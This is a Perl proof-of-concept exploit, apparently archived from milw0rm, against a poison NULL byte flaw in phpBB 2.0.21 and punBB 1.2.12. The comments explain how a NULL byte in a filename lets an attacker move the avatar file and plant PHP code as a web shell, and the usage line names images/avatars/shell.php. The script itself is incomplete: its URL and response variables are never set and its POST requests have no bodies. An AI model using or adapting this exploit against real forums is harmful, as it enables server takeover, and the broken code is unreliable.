#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
# A PoC exploit to change Avatar file location for phpBB:
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
my $req = new HTTP::Request 'POST',$url;
my $res = $ua->request($req);
$content=~ m/true&sid=([^"]+)"/g;
print $content;
$req = new HTTP::Request 'POST',$url;
$res = $ua->request($req);
$req = new HTTP::Request 'POST',$url;
$res = $ua->request($req);
print $content;
# milw0rm.com [2006-09-11]